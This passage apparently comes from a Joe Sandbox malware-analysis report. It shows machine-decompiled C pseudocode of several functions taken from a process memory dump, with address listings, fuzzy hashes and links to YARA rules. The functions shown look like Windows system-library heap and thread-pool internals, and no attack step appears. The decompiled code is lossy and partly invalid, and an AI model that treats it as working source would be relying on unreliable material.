								_push( &_v40);
								_push(1);
								_v52 = _t155;
								_push( &_v56);
								_push(1);
								_push(2);
								_push(0xc000007b);
								_t105 = E04CF4020();
								__eflags = _t105;
								if(_t105 >= 0) {
									__eflags =  *0x4da65f4 - 3;
									if( *0x4da65f4 != 3) {
										 *0x4da5a9c =  *0x4da5a9c + 1;
									}
								}
							}
						}
					}
					goto L57;
				}
				if(E04CC3C40() != 0) {
					_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t132 != 0) {
					_t108 =  *[fs:0x30];
					__eflags =  *(_t108 + 0x240) & 0x00000004;
					if(( *(_t108 + 0x240) & 0x00000004) != 0) {
						_t117 = E04CC3C40();
						__eflags = _t117;
						if(_t117 == 0) {
							_t118 = 0x7ffe0385;
						} else {
							_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t118 & 0x00000020;
						if(( *_t118 & 0x00000020) != 0) {
							E04D30227(0x1486, _t146 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *(_t151 + 0x10) & 0x00000100) != 0) {
					L21:
					__eflags = _t155;
					if(_t155 < 0) {
						goto L17;
					} else {
						goto L16;
					}
				} else {
					if( *0x4da68e4 != 0) {
						_t156 =  *0x4da5b64; // 0x0
						asm("ror esi, cl");
						 *0x4da91e0(_v12, _v28, 0x20);
						_t116 =  *(_t156 ^  *0x7ffe0330)();
						_t70 = _t116 + 0x3ffffddb; // 0x3ffffddb
						asm("sbb esi, esi");
						_t155 =  ~_t70 & _t116;
						goto L21;
					}
					L16:
					_t155 = E04CD1332(_t151, _v20);
					if(_v32 != 0) {
						__eflags = _t155;
						if(_t155 < 0) {
							goto L17;
						}
						 *(_t151 + 0x64) = _v12;
						 *((intOrPtr*)(_t151 + 0xc)) = _v20;
						goto L19;
					}
					L17:
					_push(_v20);
					E04CF2A80();
					goto L18;
				}
			}

0x04cde512
0x04cde514
0x04cde518
0x04cde51e
0x04cde521
0x04cde52b
0x00000000
0x04cde531
0x04cde531
0x04cde534
0x04cde534
0x04cde53c
0x04cde53e
0x04cde541
0x04cde548
0x04cde558
0x04cde55b
0x04cde55c
0x04cde55c
0x04cde55c
0x04cde563
0x04cde566
0x04cde569
0x04cde56c
0x04cde56f
0x04cde574
0x04cde57b
0x04d1f88f
0x04cde581
0x04cde581
0x04cde581
0x04cde586
0x04d1f899
0x04d1f89f
0x04d1f8a6
0x04d1f8ac
0x04d1f8b1
0x04d1f8b3
0x04d1f8c5
0x04d1f8b5
0x04d1f8be
0x04d1f8be
0x04d1f8ca
0x04d1f8cd
0x04d1f8d9
0x04d1f8dc
0x04d1f8e1
0x04d1f8e1
0x04d1f8cd
0x04d1f8a6
0x04cde599
0x04d1f8eb
0x04d1f8ee
0x04d1f8ef
0x04d1f8f0
0x04d1f8f3
0x04d1f8f9
0x04d1f8ff
0x04d1f901
0x04d1f902
0x04d1f904
0x04d1f904
0x04cde59f
0x04cde5a2
0x04cde5a2
0x04cde5a4
0x04cde5a9
0x04cde5ad
0x04cde5ae
0x04cde5b6
0x04cde5bc
0x04cde5c0
0x00000000
0x00000000
0x04d1f90e
0x04d1f914
0x04d1f94b
0x04d1f94b
0x04d1f950
0x04d1f950
0x04d1f952
0x04cde655
0x00000000
0x04cde655
0x00000000
0x04d1f958
0x04d1f916
0x04d1f91c
0x00000000
0x00000000
0x04d1f91e
0x04d1f924
0x00000000
0x00000000
0x04d1f926
0x04d1f92a
0x00000000
0x00000000
0x04d1f930
0x04d1f932
0x04d1f937
0x04d1f939
0x00000000
0x00000000
0x04d1f93f
0x04d1f93f
0x04cde5cd
0x04d1f95d
0x04d1f968
0x04d1f96a
0x04d1f96c
0x00000000
0x00000000
0x04d1f972
0x04d1f979
0x04cde64d
0x04cde64d
0x04cde650
0x00000000
0x04cde650
0x04d1f97f
0x04cde5d3
0x04cde5da
0x04d1f984
0x04d1f98a
0x04d1f98e
0x00000000
0x00000000
0x04d1f994
0x04d1f9a9
0x04d1f9ab
0x04d1f9ad
0x00000000
0x00000000
0x04d1f9b3
0x04cde5e0
0x04cde5e0
0x04cde5e6
0x04cde5eb
0x04cde5ed
0x04cde5ef
0x04cde5f1
0x04cde5f3
0x04cde5f9
0x04cde5fd
0x04d1f9b8
0x04d1f9be
0x04d1fa1e
0x04d1fa1f
0x04d1fa24
0x04d1fa27
0x04d1fa29
0x04d1fa33
0x00000000
0x04d1fa33
0x04d1f9c0
0x04d1f9c6
0x00000000
0x00000000
0x04d1f9c8
0x04d1f9ce
0x00000000
0x00000000
0x04d1f9d0
0x04d1f9d3
0x04d1f9d9
0x04d1f9db
0x04d1f9e1
0x04d1f9e3
0x04d1f9e9
0x04d1f9ee
0x04d1f9f1
0x04d1f9f2
0x04d1f9f7
0x04d1f9fa
0x04d1f9fb
0x04d1f9fd
0x04d1f9ff
0x04d1fa04
0x04d1fa09
0x04d1fa0b
0x04d1fa0d
0x04d1fa14
0x04d1fa16
0x04d1fa16
0x04d1fa14
0x04d1fa0b
0x04d1f9e9
0x04d1f9e1
0x00000000
0x04d1f9d9
0x04cde60a
0x04d1fa46
0x04d1fa46
0x04cde613
0x04d1fa51
0x04d1fa57
0x04d1fa5e
0x04d1fa64
0x04d1fa69
0x04d1fa6b
0x04d1fa7d
0x04d1fa6d
0x04d1fa76
0x04d1fa76
0x04d1fa82
0x04d1fa85
0x04d1fa9b
0x04d1fa9b
0x04d1fa85
0x04d1fa5e
0x04cde620
0x04cde65c
0x04cde65c
0x04cde65e
0x00000000
0x04cde660
0x00000000
0x04cde660
0x04cde622
0x04cde629
0x04d1faad
0x04d1fac1
0x04d1fac7
0x04d1facd
0x04d1facf
0x04d1fad7
0x04d1fad9
0x00000000
0x04d1fad9
0x04cde62f
0x04cde63d
0x04cde63f
0x04d1fae0
0x04d1fae2
0x00000000
0x00000000
0x04d1faeb
0x04d1faf1
0x00000000
0x04d1faf1
0x04cde645
0x04cde645
0x04cde648
0x00000000
0x04cde648

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f6db952df4624e9437ef051efea917af6f2eaadbab1b0a12b447d2ae9a2832
Instruction ID: bb016e8687b032f255d27ddb9534b31509744a7e5041d0c6a2dafaaf13c6b2be
Opcode Fuzzy Hash: d1f6db952df4624e9437ef051efea917af6f2eaadbab1b0a12b447d2ae9a2832
Instruction Fuzzy Hash: 1EA1FA71F00618AFEB21DF94D844BAEB7A6FB04758F05015AEE11AB2A0E778BD41C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 04CF00A5 Relevance: .3, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04CF00A5(intOrPtr* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v44;
				char _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				signed char _v76;
				char _v80;
				intOrPtr* _v84;
				intOrPtr* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t107;
				signed int _t118;
				signed int _t127;
				signed int _t130;
				intOrPtr _t141;
				intOrPtr _t147;
				signed int _t156;
				signed int _t157;
				signed char _t160;
				signed int _t164;
				signed int _t166;
				signed int _t180;
				unsigned int _t189;
				unsigned int _t190;
				unsigned int _t191;
				intOrPtr* _t201;
				signed int _t202;
				signed int _t205;
				signed int _t206;

				_v8 =  *0x4dab370 ^ _t206;
				_t201 = _a8;
				_v84 = __edx;
				_t197 = 0;
				_v88 = _a4;
				_v60 = 0;
				_v72 = 0;
				_v68 = 0;
				if( *_t201 < 0xb0) {
					L31:
					_push(0x57);
					L32:
					_pop(_t101);
					L30:
					return E04CF4B50(_t101, _t160, _v8 ^ _t206, _t197, _t201, _t202);
				}
				_t160 =  *(_t201 + 0x40);
				 *((intOrPtr*)(_t201 + 0x94)) = _t201 + 0xb0;
				 *((intOrPtr*)(_t201 + 0x84)) = ( *(_t201 + 0x92) & 0x0000ffff) + 0xb0 + _t201;
				_t202 = 1;
				_t164 = _t160 & 0x0000040b;
				if(_t164 == 0) {
					_t160 = _t160 | _t202;
					 *(_t201 + 0x40) = _t160;
					L4:
					if((_t160 & 0x02000000) != 0) {
						goto L31;
					}
					_t166 = _t160 & 0x00000400;
					if(_t166 != 0) {
						__eflags =  *((intOrPtr*)(_t201 + 0x80)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x80)) != _t197) {
							goto L31;
						}
						__eflags =  *((intOrPtr*)(_t201 + 0x44)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x44)) != _t197) {
							goto L31;
						}
						__eflags =  *(_t201 + 0x4c) - _t197;
						if( *(_t201 + 0x4c) != _t197) {
							goto L31;
						}
					}
					_t107 =  *(_t201 + 0x4c);
					if(_t107 != 0) {
						__eflags =  *((intOrPtr*)(_t201 + 0x44)) - _t197;
						if( *((intOrPtr*)(_t201 + 0x44)) != _t197) {
							goto L31;
						}
						__eflags = _t107;
						if(_t107 < 0) {
							goto L31;
						}
					}
					if((_t160 & 0x00000006) == 6) {
						goto L31;
					}
					_t197 = 0xc000;
					if((_t160 & 0x0000c000) == 0xc000) {
						goto L31;
					}
					if((_t160 & 0x04000000) != 0) {
						__eflags = _t160 & 0x00000026;
						if((_t160 & 0x00000026) != 0) {
							goto L31;
						}
						__eflags = _t166;
						if(_t166 != 0) {
							goto L31;
						}
					}
					_t197 =  &_v60;
					if(E04CF1B63(_t201 + 0x90,  &_v60) == 0) {
						asm("lock dec dword [eax+ecx*8+0x4]");
						_t101 = 0xb7;
						goto L30;
					}
					_t197 =  &_v76;
					if(E04CF1AA0(_t201,  &_v76) != 0) {
						goto L30;
					}
					if(( *(_t201 + 0x40) & 0x00010000) != 0) {
						_t118 = ( *(_t201 + 0x92) & 0x0000ffff) + 0x000000b7 + ( *(_t201 + 0x82) & 0x0000ffff) & 0xfffffff8;
						_v68 =  *_t201 - _t118;
						_t205 = _t201 + _t118;
						_v72 = _t205;
						_t202 = _t205 | 0xffffffff;
					} else {
						if(( *(_t201 + 0x40) & 0x10000000) == 0) {
							_t202 =  *( *[fs:0x30] + 0x64);
						}
					}
					_t160 = _v76;
					_t197 = _t160;
					_v56 = _t160;
					_t202 = E04CF1763(_t201, _t160, _t202, _v72, _v68);
					_v60 = _t202;
					if(_t202 == 0) {
						asm("lock dec dword [eax+ebx*8+0x4]");
						_push(8);
						goto L32;
					} else {
						_push(0);
						_push(0x2c);
						_push( &_v52);
						_push(0);
						if(E04CF2D10() < 0) {
							_t101 = E04CDABA0(_t122);
							goto L30;
						}
						 *(_t202 + 0x8c) =  *(_t202 + 0x8c) - 0x00000001 + _v44 &  !(_v44 - 1);
						if(( *(_t202 + 0xd4) & 0x04000000) != 0) {
							_t127 = E04D832C9(_t202);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L18;
							}
							_t160 = E04CDABA0(_t127);
							__eflags = _t160;
							if(_t160 == 0) {
								goto L18;
							}
							L50:
							__eflags =  *(_t201 + 0x58);
							if( *(_t201 + 0x58) != 0) {
								_push( *(_t201 + 0x58));
								E04CF2A80();
								 *(_t201 + 0x58) =  *(_t201 + 0x58) & 0x00000000;
								_t89 = _t202 + 0x68;
								 *_t89 =  *(_t202 + 0x68) & 0x00000000;
								__eflags =  *_t89;
							}
							E04CEE363(_t202, _t197);
							L29:
							_t101 = _t160;
							goto L30;
						}
						L18:
						_t128 =  *(_t202 + 0xd4);
						if(( *(_t202 + 0xd4) & 0x00000400) != 0) {
							L20:
							_t130 =  *(_t202 + 0x8c) + 0xffffffb8;
							if(_t130 >= 0xffff) {
								_t130 = 0xffff;
							}
							 *(_t202 + 0x90) = _t130 & 0xfffffff8;
							_t160 = E04CF0655(_t202);
							if(_t160 != 0) {
								goto L50;
							} else {
								if(( *(_t202 + 0xd4) & 0x00020000) == 0) {
									_t197 =  &_v80;
									_t160 = E04D81A9E( *((intOrPtr*)(_t202 + 0x14)),  &_v80,  &_v64);
									__eflags = _t160;
									if(_t160 != 0) {
										goto L50;
									}
									 *((intOrPtr*)(_t202 + 0x17c)) = _v80;
								}
								_t180 = _v56;
								asm("lock inc dword [eax+ecx*8+0x4]");
								if(( *(_t202 + 0xd4) & 0x00000400) != 0) {
									L26:
									E04CF03FA(_t201, _t202,  &_v64);
									_t141 =  *0x4da41d4; // 0x0
									 *(_t141 + _v56 * 8) = _t202;
									_push(0);
									_t197 = 5;
									E04CF0344(_t202, _t197, _t230);
									L27:
									asm("lock dec dword [eax+ecx*8+0x4]");
									if(_t160 != 0) {
										goto L50;
									}
									 *_v84 =  *_t201;
									 *_v88 =  *_t201;
									goto L29;
								}
								_t147 = E04CF04D0(_t180, E04CF22A0, _t202);
								_t230 = _t147;
								if(_t147 == 0) {
									_t202 = _v60;
									_t160 =  *( *[fs:0x18] + 0x34);
									goto L27;
								}
								 *((intOrPtr*)(_t202 + 0x1c)) = _t147;
								goto L26;
							}
						}
						_t197 = _v72;
						if(E04CF088E(_t202, _v72, _v68, _t128 >> 0x00000002 & 1) != 0) {
							_t160 = E04CDABA0(_t152);
							__eflags = _t160;
							if(_t160 != 0) {
								goto L50;
							}
						}
						goto L20;
					}
				}
				_t189 =  !_t164;
				_t156 = _t189 & 0x000000ff;
				_t190 = _t189 >> 8;
				_t157 = _t190 & 0x000000ff;
				_t191 = _t190 >> 8;
				_v56 = _t191;
				_t197 =  *((intOrPtr*)(_t156 + 0x4c8b330)) +  *((intOrPtr*)(_t157 + 0x4c8b330));
				if( *((intOrPtr*)((_t191 >> 8) + 0x4c8b330)) +  *((intOrPtr*)((_v56 & 0x000000ff) + 0x4c8b330)) +  *((intOrPtr*)(_t156 + 0x4c8b330)) +  *((intOrPtr*)(_t157 + 0x4c8b330)) != 1) {
					goto L31;
				}
				_t197 = 0;
				goto L4;
			}

0x04cf00b4
0x04cf00bd
0x04cf00c0
0x04cf00c3
0x04cf00c5
0x04cf00c8
0x04cf00d1
0x04cf00d4
0x04cf00d7
0x04cf033f
0x04cf033f
0x04cf0341
0x04cf0341
0x04cf032e
0x04cf033c
0x04cf033c
0x04cf00dd
0x04cf00e6
0x04cf00fc
0x04cf0104
0x04cf0105
0x04cf010b
0x04d293fb
0x04d293fd
0x04cf0150
0x04cf0156
0x00000000
0x00000000
0x04cf015e
0x04cf0164
0x04d29405
0x04d2940c
0x00000000
0x00000000
0x04d29412
0x04d29415
0x00000000
0x00000000
0x04d2941b
0x04d2941e
0x00000000
0x00000000
0x04d29424
0x04cf016a
0x04cf016f
0x04d29429
0x04d2942c
0x00000000
0x00000000
0x04d29432
0x04d29434
0x00000000
0x00000000
0x04d2943a
0x04cf017c
0x00000000
0x00000000
0x04cf0182
0x04cf018d
0x00000000
0x00000000
0x04cf0199
0x04d2943f
0x04d29442
0x00000000
0x00000000
0x04d29448
0x04d2944a
0x00000000
0x00000000
0x04d29450
0x04cf01a5
0x04cf01af
0x04d29460
0x04d29465
0x00000000
0x04d29465
0x04cf01b5
0x04cf01c1
0x00000000
0x00000000
0x04cf01ce
0x04d29486
0x04d2948b
0x04d2948e
0x04d29491
0x04d29494
0x04cf01d4
0x04cf01db
0x04cf01e3
0x04cf01e3
0x04cf01db
0x04cf01e9
0x04cf01f1
0x04cf01f3
0x04cf01fc
0x04cf01fe
0x04cf0203
0x04d294a1
0x04d294a6
0x00000000
0x04cf0209
0x04cf0209
0x04cf020b
0x04cf0210
0x04cf0211
0x04cf021a
0x04d294ae
0x00000000
0x04d294ae
0x04cf0231
0x04cf0241
0x04d294ba
0x04d294bf
0x04d294c1
0x00000000
0x00000000
0x04d294cd
0x04d294cf
0x04d294d1
0x00000000
0x00000000
0x04d294d7
0x04d294d7
0x04d294db
0x04d294dd
0x04d294e0
0x04d294e5
0x04d294e9
0x04d294e9
0x04d294e9
0x04d294e9
0x04d294ef
0x04cf032c
0x04cf032c
0x00000000
0x04cf032c
0x04cf0247
0x04cf0247
0x04cf0252
0x04cf0272
0x04cf027d
0x04cf0282
0x04d2950a
0x04d2950a
0x04cf028d
0x04cf0298
0x04cf029c
0x00000000
0x04cf02a2
0x04cf02ac
0x04d29519
0x04d29521
0x04d29523
0x04d29525
0x00000000
0x00000000
0x04d2952a
0x04d2952a
0x04cf02b7
0x04cf02ba
0x04cf02c9
0x04cf02e1
0x04cf02e9
0x04cf02ee
0x04cf02fb
0x04cf02fd
0x04cf0301
0x04cf0304
0x04cf0309
0x04cf0311
0x04cf0318
0x00000000
0x00000000
0x04cf0323
0x04cf032a
0x00000000
0x04cf032a
0x04cf02d1
0x04cf02d6
0x04cf02d8
0x04d2953b
0x04d2953e
0x00000000
0x04d2953e
0x04cf02de
0x00000000
0x04cf02de
0x04cf029c
0x04cf0254
0x04cf026c
0x04d294ff
0x04d29501
0x04d29503
0x00000000
0x00000000
0x04d29505
0x00000000
0x04cf026c
0x04cf0203
0x04cf0111
0x04cf0113
0x04cf0116
0x04cf011f
0x04cf0122
0x04cf0125
0x04cf012b
0x04cf0148
0x00000000
0x00000000
0x04cf014e
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc135a11b49380a24efe3825d9faf2241e4ccf1ed5004d4a841e050a24d9973
Instruction ID: 3f2f45c6efc08d9222d7166e6102c8f6594c3ed805a7f7aeb7c5bb6a84ed2da2
Opcode Fuzzy Hash: abc135a11b49380a24efe3825d9faf2241e4ccf1ed5004d4a841e050a24d9973
Instruction Fuzzy Hash: DDA1C2B0B00615DFDB64DF66CD90BBAB7B2FF44718F144029EA0597282EB38B915DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04D84080 Relevance: .3, Instructions: 275
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04D84080(signed int __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				char _v53;
				intOrPtr _v56;
				char _v57;
				signed int* _v60;
				char _v61;
				intOrPtr _v100;
				void* _t107;
				intOrPtr* _t109;
				intOrPtr _t121;
				intOrPtr _t125;
				signed int* _t131;
				intOrPtr _t138;
				intOrPtr _t142;
				intOrPtr _t147;
				signed int _t153;
				signed int _t156;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t160;
				intOrPtr _t161;
				signed int* _t167;
				signed int* _t168;
				intOrPtr _t170;
				signed int* _t174;
				intOrPtr _t176;
				signed int _t183;
				signed int _t189;
				signed int* _t190;
				intOrPtr _t191;
				unsigned int _t193;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				signed int _t210;
				signed int* _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr* _t222;
				void* _t224;
				intOrPtr* _t225;
				intOrPtr _t226;
				intOrPtr _t230;
				unsigned int _t231;
				intOrPtr _t234;
				signed int _t238;
				signed int _t242;
				intOrPtr _t243;

				_t198 = __ecx;
				_v8 = _v8 | 0xffffffff;
				_v12 = 0xfff0bdc0;
				L04CC2330(_t107, 0x4da6884);
				_t109 =  *0x4da3420; // 0x2f108a8
				while(_t109 != 0x4da3420) {
					_t222 = _t109;
					_v16 =  *_t109;
					_v28 = _t222 - 8;
					L04CB53C0(_t222 - 8);
					if( *((char*)(_t222 - 3)) == 0) {
						_v20 = _t222 - 0xbc;
						L04CC2330(_t222 - 0xbc, _t222 - 0xbc);
						_v44 = _v44 & 0x00000000;
						_push(4);
						_push( &_v44);
						_push(0xc);
						_push( *((intOrPtr*)(_t222 - 0xc4)));
						_v53 = 1;
						if(E04CF43A0() < 0) {
							L39:
							E04CC24D0(_v20);
							_push(_v32);
							goto L40;
						} else {
							_t234 = _v40;
							if(_t234 == 0) {
								goto L39;
							} else {
								_t189 = 0;
								_t238 = (_t234 + _t234 ^  *(_t222 + 0x24)) & 0x00000ffe ^  *(_t222 + 0x24);
								 *(_t222 + 0x24) = _t238;
								_t198 = _t238 >> 0x0000000b & 0x00000ffe;
								if((_t238 >> 0x0000000b & 0x00000ffe) < (_t238 & 0x00000ffe)) {
									while(_t189 != 0x102) {
										_t183 = L04CC21D0(_t222 + 0x2c, _t222 - 0xbc,  &_v12, 0);
										_t238 =  *(_t222 + 0x24);
										_t189 = _t183;
										_t198 = _t238 & 0x00000ffe;
										if((_t238 >> 0x0000000b & 0x00000ffe) < (_t238 & 0x00000ffe)) {
											continue;
										}
										goto L8;
									}
								}
								L8:
								if((_t238 & 0x007ff000) != 0) {
									_t121 =  *0x4da6644; // 0x0
									_t125 = E04CC5D90(_t198,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t121 + 0x000c0000 | 0x00000008, (_t238 >> 0x0000000c & 0x000007ff) << 2);
									_v56 = _t125;
									_t190 = _t222 + 0x30;
									if(_t125 != 0) {
										_t201 =  *0x4da6644; // 0x0
										_t198 = _t201 + 0x000c0000 | 0x00000008;
										_t131 = E04CC5D90(_t201 + 0x000c0000 | 0x00000008,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t201 + 0x000c0000 | 0x00000008, ( *(_t222 + 0x24) >> 0x0000000c & 0x000007ff) << 2);
										_v60 = _t131;
										if(_t131 != 0) {
											_t242 = 0;
											_t214 = _t131;
											_v32 = _v44 - _t131;
											while(1) {
												_t198 =  *_t190;
												if(_t198 == _t190) {
													break;
												}
												 *((intOrPtr*)(_t214 + _v32)) =  *((intOrPtr*)(_t198 + 8));
												_t190 = _t222 + 0x30;
												 *_t214 = _t198;
												_t158 =  *_t198;
												_v36 = _t158;
												if( *((intOrPtr*)(_t158 + 4)) != _t198) {
													goto L44;
												} else {
													_t167 =  *(_t198 + 4);
													if( *_t167 != _t198) {
														goto L44;
													} else {
														_t210 = _v36;
														_t242 = _t242 + 1;
														 *_t167 = _t210;
														_t214 =  &(_t214[1]);
														 *(_t210 + 4) = _t167;
														continue;
													}
												}
												goto L58;
											}
											 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
											E04CC24D0(_t222 - 0xbc);
											E04CB52F0(_t198, _t222 - 8);
											_v44 = _v44 & 0x00000000;
											_t191 = _v52;
											_t224 = 0;
											_v57 = 0;
											_v32 = _t242 >> 6;
											while(_t224 < _t242) {
												_t67 = _t224 + 0x40; // 0x40
												if(_t67 > _t242) {
													_t153 = _t242 & 0x0000003f;
												} else {
													_t153 = 0x40;
												}
												_t198 =  &_v12;
												_push( &_v12);
												_push(0);
												_push(0);
												_push(_t191);
												_push(_t153);
												if(E04CF2F60() != 0x102) {
													_t224 = _t224 + 0x40;
													_t156 = _v36 + 1;
													_t191 = _t191 + 0x100;
													_v36 = _t156;
													if(_t156 <= _v24) {
														continue;
													}
												}
												break;
											}
											if(_t242 != 0) {
												_t225 = _v48;
												_t193 = _v32;
												do {
													_push( *((intOrPtr*)(_t225 + _t193)));
													E04CF2A80();
													_t147 =  *0x4da6644; // 0x0
													E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t147 + 0xc0000,  *_t225);
													_t225 = _t225 + 4;
													_t242 = _t242 - 1;
												} while (_t242 != 0);
											}
											_t138 =  *0x4da6644; // 0x0
											E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t138 + 0xc0000, _v48);
											goto L38;
										} else {
											while(1) {
												_t242 =  *_t190;
												if(_t242 == _t190) {
													break;
												}
												_t198 =  *_t242;
												if( *(_t198 + 4) != _t242) {
													goto L44;
												} else {
													_t168 =  *(_t242 + 4);
													if( *_t168 != _t242) {
														goto L44;
													} else {
														 *_t168 = _t198;
														 *(_t198 + 4) = _t168;
														_push( *((intOrPtr*)(_t242 + 8)));
														E04CF2A80();
														_t170 =  *0x4da6644; // 0x0
														E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t170 + 0xc0000, _t242);
														continue;
													}
												}
												goto L58;
											}
											 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
											L38:
											_t142 =  *0x4da6644; // 0x0
											E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t142 + 0xc0000, _v44);
											if(_v61 != 0) {
												goto L39;
											}
											goto L41;
										}
									} else {
										while(1) {
											_t242 =  *_t190;
											if(_t242 == _t190) {
												break;
											}
											_t198 =  *_t242;
											if( *(_t198 + 4) != _t242) {
												L44:
												_t205 = 3;
												asm("int 0x29");
												_t159 = _t205;
												_v100 = _t159;
												_push(_t222);
												if(_t159 == 0) {
													L47:
													_t226 =  *0x7ffe03c0;
													_v20 = _t226;
												} else {
													_t226 =  *((intOrPtr*)(_t159 + 0x110));
													_v20 = _t226;
													if(_t226 == 0) {
														goto L47;
													}
												}
												_t206 =  *((intOrPtr*)(_t159 + 0x100));
												if(_t226 != _t206) {
													 *((intOrPtr*)(_t159 + 0x100)) = _t226;
													_t216 = _t226 - _t206;
													_v16 = _t216;
													if(_t216 != 0) {
														_t160 = _t159 + 8;
														_v24 = _t160;
														_push(_t190);
														_push(_t242);
														_t207 =  *_t160;
														_t161 =  *((intOrPtr*)(_t160 + 4));
														_v12 = _t161;
														do {
															_t217 = _t161;
															_t243 = _t207;
															_v28 = _t217;
															asm("lock cmpxchg8b [edi]");
															_t207 = _t243;
															_t161 = _t217;
															_v12 = _t161;
														} while (_t207 != _t243 || _t161 != _v28);
														_t230 = _v20;
														if(_t230 < 4) {
															_t231 = 4;
														} else {
															_t231 = _t230 + 1;
														}
														_t244 = _v36;
														_push(4);
														_push( &_v32);
														_push(8);
														_t105 = _t244 + 0x24; // 0x408bf455
														_push( *_t105);
														_v32 = _t231;
														E04CF43A0();
														_t159 = L04CB3722(_v36);
													}
												}
												return _t159;
											} else {
												_t174 =  *(_t242 + 4);
												if( *_t174 != _t242) {
													goto L44;
												} else {
													 *_t174 = _t198;
													 *(_t198 + 4) = _t174;
													_push( *((intOrPtr*)(_t242 + 8)));
													E04CF2A80();
													_t176 =  *0x4da6644; // 0x0
													E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t176 + 0xc0000, _t242);
													continue;
												}
											}
											goto L58;
										}
										 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
										goto L39;
									}
								} else {
									 *(_t222 + 0x24) = _t238 & 0xfffff001;
									goto L39;
								}
							}
						}
					} else {
						_push(_v28);
						L40:
						E04CB52F0(_t198);
						L41:
						_t109 = _v16;
						continue;
					}
					L58:
				}
				return E04CC24D0(0x4da6884);
				goto L58;
			}

0x04d84080
0x04d8408b
0x04d84098
0x04d840a0
0x04d840a5
0x04d843e6
0x04d840af
0x04d840b3
0x04d840bb
0x04d840bf
0x04d840c8
0x04d840db
0x04d840df
0x04d840e4
0x04d840ed
0x04d840ef
0x04d840f0
0x04d840f2
0x04d840f8
0x04d84104
0x04d843d0
0x04d843d4
0x04d843d9
0x00000000
0x04d8410a
0x04d8410a
0x04d84110
0x00000000
0x04d84116
0x04d84120
0x04d84124
0x04d84129
0x04d84131
0x04d84137
0x04d84139
0x04d84153
0x04d84158
0x04d8415b
0x04d8416b
0x04d8416f
0x00000000
0x00000000
0x00000000
0x04d8416f
0x04d84139
0x04d84171
0x04d84177
0x04d84187
0x04d841ab
0x04d841b0
0x04d841b4
0x04d841b9
0x04d8420f
0x04d84223
0x04d84234
0x04d84239
0x04d8423f
0x04d84296
0x04d8429a
0x04d8429c
0x04d842a0
0x04d842a0
0x04d842a4
0x00000000
0x00000000
0x04d842ad
0x04d842b0
0x04d842b3
0x04d842b5
0x04d842b7
0x04d842be
0x00000000
0x04d842c4
0x04d842c4
0x04d842c9
0x00000000
0x04d842cf
0x04d842cf
0x04d842d3
0x04d842d4
0x04d842d6
0x04d842d9
0x00000000
0x04d842d9
0x04d842c9
0x00000000
0x04d842be
0x04d842de
0x04d842ec
0x04d842f5
0x04d842fa
0x04d84301
0x04d84308
0x04d8430a
0x04d8430f
0x04d84313
0x04d84317
0x04d8431c
0x04d84325
0x04d8431e
0x04d84320
0x04d84320
0x04d84328
0x04d8432c
0x04d8432d
0x04d8432f
0x04d84331
0x04d84332
0x04d8433d
0x04d84343
0x04d84346
0x04d84347
0x04d8434d
0x04d84355
0x00000000
0x00000000
0x04d84355
0x00000000
0x04d8433d
0x04d84359
0x04d8435b
0x04d8435f
0x04d84363
0x04d84363
0x04d84366
0x04d8436d
0x04d84381
0x04d84386
0x04d84389
0x04d84389
0x04d84363
0x04d8438e
0x04d843a7
0x00000000
0x04d84241
0x04d84241
0x04d84241
0x04d84245
0x00000000
0x00000000
0x04d84247
0x04d8424c
0x00000000
0x04d84252
0x04d84252
0x04d84257
0x00000000
0x04d8425d
0x04d8425d
0x04d8425f
0x04d84262
0x04d84265
0x04d8426a
0x04d8427f
0x00000000
0x04d8427f
0x04d84257
0x00000000
0x04d8424c
0x04d84286
